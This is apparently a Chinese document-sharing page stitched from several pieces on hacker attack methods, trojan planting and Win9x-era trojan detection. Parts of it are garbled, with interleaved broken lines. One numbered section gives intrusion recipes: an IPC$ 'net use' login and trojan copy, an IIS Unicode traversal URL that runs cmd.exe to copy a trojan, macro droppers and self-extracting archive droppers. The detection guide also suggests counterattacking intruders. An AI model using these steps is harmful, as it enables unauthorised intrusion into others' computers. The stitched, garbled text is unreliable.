好的黑客会通知管理员修补相关漏洞五、常见攻击手法1、口令入侵所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机,然后再实施攻击活动。

黑客常用的攻击方法及流程

黑客常用的攻击方法及流程
清除攻击痕迹,避免被管理员 发现
社交工程、物理闯入、普通Web搜索、whois数 据库、域名系统(DNS)等
使用专门的工具软件,如端口扫描器和漏洞扫 描器
利用各种各样的漏洞,使用相应的软件发动攻 击,包括嗅探器、IP地址欺诈、会话劫持、 密码攻击、拒绝服务器攻击等
使用特洛伊木马、后门、RootKit等
2)内联网与Internet内容类似,但主要关注内部网络的 独立地址空间及名称空间。
3)远程访问模拟/数字电话号码和VPN访问点。 4)外联网与合作伙伴及子公司的网络的连接地址、连接 类型及访问控制机制。 5)开放资源未在前四类中列出的信息,例如,Usenet、 雇员配客入侵后的攻击方法 黑客常用的攻击流程
黑客入侵后的攻击方法
早期主要的攻击方法以口令破解、泛洪式拒绝服务和特洛伊木马为主;20世
纪90年代开始兴起缓冲区溢出、网络信息探测和网络漏洞扫描攻击;近几年出
现了综合各种网络攻击手段的网络欺骗攻击、分布式拒绝服务攻击和分布式网
络病毒攻击。
网络信息安全技术
黑客常用的攻击方法及流程
黑客入侵前的攻击方法 黑客入侵后的攻击方法 黑客常用的攻击流程
黑客入侵前的攻击方法
黑客在进行攻击前,要有一些前期工作要做,就像窃贼作案 之前要“盯梢”、“踩点”一样,其主要是目标是获取如下信息
1)互联网网络域名、网络地址分配、域名服务器、邮件 交换主机和网关等关键系统的位置及软硬件信息。
展到W翻i新nd,ow防s不9胜8/N防T/2000/XP系
漏洞类攻击
统的在病网毒络,中U传N输IX着/Li0n、ux1平数台字的化病信 息,无论毒是也否已经出过现调制,在线
路上的任一点,在时序上传过
病毒类攻击 的电信号有、无或强、弱区别

[基础知识] 黑客常用入侵手段

[基础知识] 黑客常用入侵手段

黑客常用入侵手段入侵行为主要是指对系统资源的非授权使用,常见入侵手段有以下几种:木马入侵、漏洞入侵1、木马入侵什么是木马?木马不属于病毒,病毒是设计来对电脑中的各种软硬件进行破坏行为的程序。

而木马是设计藏在电脑中进行特定工作或依照黑客的操作来进行某些工作的程序。

它是一个C/S结构的程序,运行在黑客的电脑上的是client端,运行在目标电脑上的是server端。

当目标电脑连上互联网后,Client端会发给Server端信息,然后听候黑客指令,执行黑客指令。

机器中木马的原因大概有以下几种:A、黑客入侵后植入,如利用NetBIOS入侵后植入。

B、利用系统或软件(IE,Outlook Express)的漏洞植入。

B、寄电子邮件后植入,寄一封夹带木马程序的信件,只要收件者没有警觉心、不注意网络安全而运行它就可能成功植入。

或通过即时聊天软件(如QQ),发送含木马的链接或者文件,接受者运行后木马就被成功植入。

(不过现在腾讯也越来越重视安全了,最新版2006版就不允许发送可执行文件。

并且登录时使用了键盘加密保护技术。

)C、在自己的网站上放一些伪装后的木马程序,宣称它是好玩的或者有用的工具等名目,让不知情的人下载后运行后便可成功植入木马程序,这点有点象姜太公钓鱼,愿者上钩。

木马被植入后黑客可以进行那些动作?这必须看黑客选用的木马程序而定。

一般我们说的木马程序多半是指功能强大且完整的工具,如冰河、SubSever等。

他们通常可以进行如下黑客任务:A:复制各类文件或电子邮件(可能包含商业秘密、个人隐私)、删除各类文件、查看被黑者电脑中的文件,就如同使用资源管理器查看一样。

B:转向入侵(redirection Intrusion),利用被黑者的电脑来进入其他电脑或服务器进行各种黑客行为,也就是找个替罪羊。

C:监控被黑者的电脑屏幕画面,键盘操作来获取各类密码,例如进入各种会员网页的密码、拨号上网的密码、网络银行的密码、邮件密码等。

木马病毒的植入

木马病毒的植入

木马病毒的植入木马病毒大家应该并不陌生,但往往最容易遇到的问题就是木马怎么植入,这里为大家详解一下,希望大家对症用药,保证自己计算机的安全。

(1)通过网上邻居(即共享入侵)要求:对方打开139端口并有可写的共享目录。

用法:直接将木马病毒上传即可。

(2)通过IPC$要求:双方均须打开IPC$,且我方有对方一个普通用户账号(具有写权限)。

用法:先用net use\\IP\IPC$"密码"/user:用户名”命令连接到对方电脑,再用“copy 本地木马路径远程木马路径、木马名字”将木马病毒复制到目标机。

(3)通过网页植入要求:对方IE未打补丁用法1:利用IE的IFRAME漏洞入侵。

用法2:利用IE的DEBUG代码入侵。

用法3:通过JS.VBS代码入侵。

用法4:通过AstiveX或Java程序入侵。

(4)通过OE入侵要求:对方OE未打补丁。

用法:与(3)中的1.3.4用法相同。

(5)通过Word.Excel.Access入侵要求:对方未对宏进行限制。

用法1:编写恶意的宏夹杂木马,一旦运行Office文档编植入主机中。

用法2:通过Office的帮助文件漏洞入侵。

(6)通过Unicode漏洞入侵要求:对方有Unicode漏洞。

用法:“http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?+COPY+本地木马路径+远程路径+木马名”。

(7)通过FIP入侵要求:对方的FIP可以无名登陆而且可以写入。

用法:直接将木马上传即可。

(8)通过TELNET入侵要求:具有对方一个具有写权限的账号。

用法:用TELNET命令将木马传上去。

(9)EXE合并木马要求:无。

用法:用EXE文件合并器将两个EXE文件合并即可。

(10)WinRAR木马入侵要求:对方安装了WinRAR。

用法:将压缩包设为自解压格式,并设置自动运行的选项,将RAR图标更改。

(11)文件夹惯性点击法要求:无。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

黑客木马入侵个人电脑的方法
要想使自己的电脑安全,就好扎好自己的篱笆,看好自己的门,电脑也有自己的门,我们叫它端口。

你在网络上冲浪,别人和你聊天,你发电子邮件,必须要有共同的协议,这个协议就是TCP/IP协议,任何网络软件的通讯都基于TCP/IP协议。

如果把互联网比作公路网,电脑就是路边的房屋,房屋要有门你才可以进出TCP/IP 协议规定,电脑可以有256乘以256扇门,即从0到65535号“门”,TCP/IP协议把它叫作“端口”。

当你发电子邮件的时候,E-mail软件把信件送到了邮件服务器的25号端口,当你收信的时候,E-mail软件是从邮件服务器的110号端口这扇门进去取信的,你现在看到的我写的东西,是进入服务器的80端口。

新安装好的个人电脑打开的端口号是139端口,你上网的时候,就是通过这个端口与外界联系的。

黑客不是神仙,他也是通过端口进入你的电脑的。

黑客是怎么样进入你的电脑的呢?当然也是基于TCP/IP协议通过某个端口进入
你的个人电脑的。

如果你的电脑设置了共享目录,那么黑客就可以通过139端口进入你的电脑,注意!WINDOWS有个缺陷,就算你的共享目录设置了多少长的密码,几秒钟时间就可以进入你的电脑,所以,你最好不要设置共享目录,不允许别人浏览你的电脑上的资料。

除了139端口以外,如果没有别的端口是开放的,黑客就不能入侵你的个人电脑。

那么黑客是怎么样才会进到你的电脑中来的呢?答案是通过特洛伊木马进入你的电
脑。

如果你不小心运行了特洛伊木马,你的电脑的某个端口就会开放,黑客就通过这个端口进入你的电脑。

举个例子,有一种典型的木马软件,叫做netspy.exe。

如果你不小心运行了netsp y.exe,那么它就会告诉WINDOWS,以后每次开电脑的时候都要运行它,然后,netspy.e xe又在你的电脑上开了一扇“门”,“门”的编号是7306端口,如果黑客知道你的73 06端口是开放的话,就可以用软件偷偷进入到你的电脑中来了。

特洛伊木马本身就是为了入侵个人电脑而做的,藏在电脑中和工作的时候是很隐蔽的,它的运行和黑客的入侵,不会在电脑的屏幕上显示出任何痕迹。

WINDOWS本身没有监视网络的软件,所以不借助软件,是不知道特洛伊木马的存在和黑客的入侵。

接下来,奇奇就让你利用软件如何发现自己电脑中的木马。

奇奇再以netspy.exe为例,现在知道netspy.exe打开了电脑的7306端口,要想知道自己的电脑是不是中netspy.exe,只要敲敲7306这扇“门”就可以了。

你先打开C:\WINDOWS\WINIPCFG.EXE程序,找到自己的IP地址(比如你的IP地址
是10.10.10.10),然后打开浏览器,在浏览器的地址栏中输入http://10.10.10. 10:7306/,如果浏览器告诉你连接不上,说明你的电脑的7306端口没有开放,如果浏览器能连接上,并且在浏览器中跳出一排英文字,说的netspy.exe的版本,那么你的电脑中了netspy.exe木马了。

这是最简单最直接的办法,但是需要你知道各种木马所开放的端口,奇奇已知下列端口是木马开放的:7306、7307、7308、12345、12345、12346、31337、6680、8111、9910。

但是就算你熟悉了所有已知木马端口,也还是不能完全防范这些木马的,我们需要进一步查找木马。

奇奇曾经做了一个试验:我知道netspy.exe开放的是7306端口,于是我用工具把它的端口修改了,经过修改的木马开放的是7777端口了,你现在再用老办法是找不到n etspy.exe木马了。

于是我们可以用扫描自己的电脑的办法看看电脑有多少端口开放着,并且再分析这些开放的端口。

前面讲了电脑的端口是从0到65535为止,其中139端口是正常的,首先找个端口扫描器,奇奇推荐“代理猎手”,你上网以后,找到自己的IP地址,现在请关闭正在运行的网络软件,因为可能开放的端口会被误认为是木马的端口,然后让代理猎手对0到65535端口扫描,如果除了139端口以外还有其他的端口开放,那么很可能是木马造成的。

排除了139端口以外的端口,你可以进一步分析了,用浏览器进入这个端口看看,它会做出什么样的反映,你可以根据情况再判断了。

扫描这么多端口是不是很累,需要半个多小时傻等了,现在好了,我汉化了一个线程监视器,Tcpview.exe可以看电脑有什么端口是开放的,除了139端口以外,还有别的端口开放,你就可以分析了,如果判定自己的电脑中了木马,那么,你就得在硬盘上删除木马最简单的办法当然是用杀毒软件删除木马了,Netvrv病毒防护墙可以帮你删除netspy.exe和bo.exe木马,但是不能删除netbus木马。

下面就netbus木马为例讲讲删除的经过。

简单介绍一下netbus木马,netbus木马的客户端有两种,开放的都是12345端口,一种以Mring.exe为代表(472,576字节),一种以SysEdit.exe为代表(494,592字节)。

Mring.exe一旦被运行以后,Mring.exe就告诉WINDOWS,每次启动就将它运行,WINDOWS将它放在了注册表中,你可以打开C:\WINDOWS\REGEDIT.EXE进入HKEY_LOCAL_ MACHINE\Software\Microsoft\Windows\CurrentVersion\Run找到Mring.exe然后删除这个健值,你再到WINDOWS中找到Mring.exe删除。

注意了,Mring.exe可能会被黑客改变名字,字节长度也被改变了,但是在注册表中的位置不会改变,你可以到注册表的这个位置去找。

另外,你可以找包含有“netbus”字符的可执行文件,再看字节的长度,我查过了,WINDOWS和其他的一些应用软件没有包含“netbus”字符的,被你找到的文件多半就是M ring.exe的变种。

SysEdit.exe被运行以后,并不加到WINDOWS的注册表中,也不会自动挂到其他程序中,于是有人认为这是傻瓜木马,奇奇倒认为这是最最可恶、最最阴险的木马。

别的木马被加到了注册表中,你就有痕迹可查了,就连专家们认为最最凶恶的BO木马也可以轻而易举地被我们从注册表中删除。

而SysEdit.exe要是挂在其他的软件中,只要你不碰这个软件,SysEdit.exe也就不发作,一旦运行了被安装SysEdit.exe的程序,SysEdit.exe也同时启动了。

奇奇
在自己的电脑中做了这样一个实验,将SysEdit.exe和C:\WINDOWS\SYSTEM\Abcwin.exe 捆绑起来,Abcwin.exe是智能ABC输入法,当我开启电脑到上网,只要没有打开智能A BC输入法打字聊天,SysEdit.exe也就没有被运行,你就不能进入我的12345端口,如果我什么时候想打字了,一旦启动智能ABC输入法(Abcwin.exe),那么捆绑在Abcwin. exe上的SysEdit.exe也同时被运行了,我的12345端口被打开,别人就可以黑到我的电脑中来了。

同样道理,SysEdit.exe可以被捆绑到网络传呼机、信箱工具等网络工具上,甚至可以捆绑到拨号工具上,电脑中的几百的程序中,你知道会在什么地方发现它吗?所以我说这是最最阴险的木马,让人防不胜防。

有的时候知道自己中了netbus木马,特别是SysEdit.exe,能发现12345端口被开放,并且可以用netbus客户端软件进入自己的电脑,却不知道木马在什么地方。

这时候,你可以检视内存,请打开C:\WINDOWS\DRWATSON.EXE,然后对内存拍照,查看“高级视图”中的“任务”标签,“程序”栏中列出的就是正在运行的程序,要是发现可疑的程序,再看“路径”栏,找到这个程序,分析它,你就知道是不是木马了。

SysEdit. exe虽然可以隐藏在其他的程序后面,但是在C:\WINDOWS\DRWATSON.EXE中还是暴露了。

好了,来回顾一下,要知道自己的电脑中有没有木马,只要看看有没有可疑端口被开放,用代理猎手、Tcpview.exe都可以知道。

要查找木马,一是可以到注册表的指定位置去找,二是可以查找包含相应的可执行程序,比如,被开放的端口是7306,就找包含“netspy”的可执行程序,三是检视内存,看有没有可以的程序在内存中。

你的电脑上的木马,来源有两种,一种是你自己不小心,运行了包含有木马的程序,另一种情况是,“网友”送给你“好玩”的程序。

所以,你以后要小心了,要弄清楚了是什么程序再运行,安装容易排除难呀。

排除了木马以后,你就可以监视端口,悄悄等待黑客的来临介绍两个软件,
首先是NukeNabber,它是端口监视器,你告诉NukeNabber需要监视7306端口,如果有人接触这个端口,就马上报警。

在别人看来,你的电脑的7306端口是开放的,但是7306不是由netspy控制了,当NukeNabber发现有人接触7306端口或者试图进入你的7 306端口,马上报警,你可以在NukeNabber上面看到黑客对你做了些什么,黑客的IP 地址是哪里,然后,你就可以反过来攻击黑客了。

当NukeNabber监视139的时候,你就可以知道谁在用IP炸弹炸你。

另外提一下,如果NukeNabber告诉你不能监视7306端口,说这个端口已经被占用了,那么说明你的电脑中存在netspy了。

第二个软件就是Tcpview.exe,这个软件是线程监视器,你可以用它来查看有多少端口是开放的,谁在和你通讯,对方的IP地址和端口分别是什么。

相关文档
最新文档